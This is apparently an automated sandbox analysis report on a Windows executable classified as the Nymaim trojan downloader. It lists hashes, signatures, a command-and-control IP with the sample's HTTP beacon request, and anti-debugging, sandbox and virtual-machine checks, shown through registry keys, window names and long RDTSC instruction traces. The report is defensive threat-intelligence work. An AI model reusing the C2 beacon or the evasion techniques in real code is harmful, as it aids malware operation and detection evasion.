Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565668
MD5: 7b58f626a6acdca919aaae907585b8c0
SHA1: 9e81feb90f37e4b80ab06846a5044330d616b748
SHA256: e57a172afd44d0e2225c849de5f6e8c2a68e263e371547b2d3f4ba951dccbc00
Tags: exeuser-Bitsight
Infos:

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses 32bit PE files

Classification

  • System is w10x64
  • file.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7B58F626A6ACDCA919AAAE907585B8C0)
  • cleanup
Name: Nymaim
Description: Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim
{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Source: 00000000.00000003.1660929409.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Author: Joe Security
Source: 0.3.file.exe.4a30000.0.raw.unpack, Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Author: Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      AV Detection

      Source: 0.3.file.exe.4a30000.0.raw.unpack - Malware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
      Source: file.exe - ReversingLabs: Detection: 34%
      Source: Submitted Sample - Integrated Neural Analysis Model: Matched 100.0% probability
      Source: file.exe - Joe Sandbox ML: detected
      Source: file.exe - Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\file.exe - File opened: C:\Windows\SysWOW64\msvcr100.dll

      Networking

      Source: Malware configuration extractor - IPs: 185.156.72.65
      Source: Joe Sandbox View - IP Address: 185.156.72.65
      Source: Joe Sandbox View - ASN Name: ITDELUXE-ASRU
      Source: unknown - TCP traffic detected without corresponding DNS query: 185.156.72.65
      Source: global traffic - HTTP traffic detected:
        GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
        User-Agent: 1
        Host: 185.156.72.65
        Connection: Keep-Alive
        Cache-Control: no-cache

      E-Banking Fraud

      Source: Yara match - File source: 0.3.file.exe.4a30000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match - File source: 00000000.00000003.1660929409.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      Source: file.exe - Static PE information: section name:
      Source: file.exe - Static PE information: section name: .idata
      Source: file.exe - Static PE information: section name:
      Source: C:\Users\user\Desktop\file.exe - Process Stats: CPU usage > 49%
      Source: file.exe - Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: file.exe - Static PE information: Section: ZLIB complexity 0.9945179803609342
      Source: file.exe - Static PE information: Section: wzuxietl ZLIB complexity 0.9924856957443697
      Source: classification engine - Classification label: mal100.troj.evad.winEXE@1/0@0/1
      Source: C:\Users\user\Desktop\file.exe - Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: file.exe - ReversingLabs: Detection: 34%
      Source: C:\Users\user\Desktop\file.exe - Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: winmm.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: msimg32.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: wininet.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: msvcr100.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: urlmon.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\file.exe - Section loaded: netutils.dll
      Source: C:\Users\user\Desktop\file.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
      Source: file.exe - Static file information: File size 2021888 > 1048576
      Source: C:\Users\user\Desktop\file.exe - File opened: C:\Windows\SysWOW64\msvcr100.dll
      Source: file.exe - Static PE information: Raw size of wzuxietl is bigger than: 0x100000 < 0x1ab600
      Source: initial sample - Static PE information: section where entry point is pointing to: .taggant
      Source: file.exe - Static PE information: real checksum: 0x1f26b7 should be: 0x1ee8d9
      Source: file.exe - Static PE information: section name:
      Source: file.exe - Static PE information: section name: .idata
      Source: file.exe - Static PE information: section name:
      Source: file.exe - Static PE information: section name: wzuxietl
      Source: file.exe - Static PE information: section name: wlxeuxhi
      Source: file.exe - Static PE information: section name: .taggant
      Source: file.exe - Static PE information: section name: entropy: 7.937026675516225
      Source: file.exe - Static PE information: section name: wzuxietl entropy: 7.951751188887942

      Boot Survival

      Source: C:\Users\user\Desktop\file.exe - Window searched: window name: FilemonClass
      Source: C:\Users\user\Desktop\file.exe - Window searched: window name: PROCMON_WINDOW_CLASS
      Source: C:\Users\user\Desktop\file.exe - Window searched: window name: RegmonClass
      Source: C:\Users\user\Desktop\file.exe - Window searched: window name: Regmonclass
      Source: C:\Users\user\Desktop\file.exe - Window searched: window name: Filemonclass

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\file.exe - File opened: HKEY_CURRENT_USER\Software\Wine
      Source: C:\Users\user\Desktop\file.exe - File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617794 second address: 617798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617B8D second address: 617BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C5219A69h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617BAA second address: 617BBD instructions: 0x00000000 rdtsc 0x00000002 je 00007FC7C474F63Eh 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617D0E second address: 617D20 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC7C5219A5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617D20 second address: 617D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C474F646h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617D3A second address: 617D69 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC7C5219A56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 jmp 00007FC7C5219A65h 0x00000015 jo 00007FC7C5219A56h 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617D69 second address: 617D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FC7C474F636h 0x0000000d jc 00007FC7C474F636h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617D7C second address: 617D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60AD00 second address: 60AD07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ECBF5 second address: 5ECBF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6185F8 second address: 61860B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC7C474F636h 0x0000000a popad 0x0000000b je 00007FC7C474F63Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618752 second address: 61875D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FC7C5219A56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6188BA second address: 6188CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007FC7C474F63Ch 0x0000000b jc 00007FC7C474F636h 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618A29 second address: 618A40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FC7C5219A5Ah 0x0000000a jo 00007FC7C5219A56h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618A40 second address: 618A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jl 00007FC7C474F636h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 ja 00007FC7C474F647h 0x0000001c jmp 00007FC7C474F63Bh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618A69 second address: 618A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC7C5219A5Ch 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618A7B second address: 618A7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618A7F second address: 618A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ECC0A second address: 5ECC2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Dh 0x00000007 jmp 00007FC7C474F641h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618D16 second address: 618D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FC7C5219A56h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618D23 second address: 618D29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B56D second address: 61B572 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B572 second address: 61B5AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC7C474F636h 0x0000000a jmp 00007FC7C474F640h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007FC7C474F649h 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B5AF second address: 61B5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC7C5219A56h 0x0000000a popad 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E122E second address: 5E1250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FC7C474F63Bh 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d jmp 00007FC7C474F63Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1250 second address: 5E125B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E125B second address: 5E125F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D95D second address: 61D961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D961 second address: 61D967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623758 second address: 62375C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62375C second address: 623766 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC7C474F636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623766 second address: 623771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FC7C5219A56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622D08 second address: 622D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C474F645h 0x00000009 pushad 0x0000000a jmp 00007FC7C474F649h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6232E6 second address: 6232EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6232EA second address: 62330C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC7C474F644h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623479 second address: 623495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C5219A66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623495 second address: 62349B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62349B second address: 6234A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6234A6 second address: 6234AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6235EB second address: 6235EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62642D second address: 626464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC7C474F636h 0x0000000a popad 0x0000000b push eax 0x0000000c jbe 00007FC7C474F64Fh 0x00000012 jmp 00007FC7C474F649h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 push edi 0x00000021 pop edi 0x00000022 popad 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626464 second address: 626492 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FC7C5219A63h 0x00000011 jno 00007FC7C5219A56h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jg 00007FC7C5219A56h 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626492 second address: 6264AF instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC7C474F636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007FC7C474F63Ch 0x00000017 jnc 00007FC7C474F636h 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6265CF second address: 6265D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62701E second address: 62703A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FC7C474F638h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 jnc 00007FC7C474F638h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62703A second address: 62703E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6272DD second address: 6272E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC7C474F636h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6272E7 second address: 6272EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6272EB second address: 6272F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62739B second address: 6273AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FC7C5219A56h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6273AF second address: 6273B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6274D3 second address: 6274D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6274D7 second address: 6274FA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC7C474F649h 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6274FA second address: 62750E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C5219A60h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62750E second address: 627557 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FC7C474F638h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D3989h], esi 0x00000029 xchg eax, ebx 0x0000002a jno 00007FC7C474F644h 0x00000030 push eax 0x00000031 pushad 0x00000032 push esi 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627557 second address: 627574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC7C5219A66h 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627574 second address: 627578 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6282BC second address: 628351 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC7C5219A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FC7C5219A5Dh 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 pushad 0x00000016 mov dword ptr [ebp+122D18CFh], ecx 0x0000001c or si, 8E9Eh 0x00000021 popad 0x00000022 xor dword ptr [ebp+124644F9h], ecx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007FC7C5219A58h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 xor edi, dword ptr [ebp+122D1908h] 0x0000004a pushad 0x0000004b mov ecx, 3430DAF3h 0x00000050 call 00007FC7C5219A5Eh 0x00000055 jmp 00007FC7C5219A63h 0x0000005a pop esi 0x0000005b popad 0x0000005c push 00000000h 0x0000005e clc 0x0000005f xchg eax, ebx 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FC7C5219A5Fh 0x00000067 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628351 second address: 628357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628357 second address: 62835B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62835B second address: 628384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FC7C474F642h 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DF645 second address: 5DF649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DF649 second address: 5DF65D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC7C474F636h 0x00000008 jnl 00007FC7C474F636h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62BF66 second address: 62BF6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62DBF6 second address: 62DC00 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC7C474F63Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F1B9 second address: 62F1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F1BE second address: 62F1C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC7C474F636h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2D41 second address: 5E2D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E2D4A second address: 5E2D59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jl 00007FC7C474F636h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
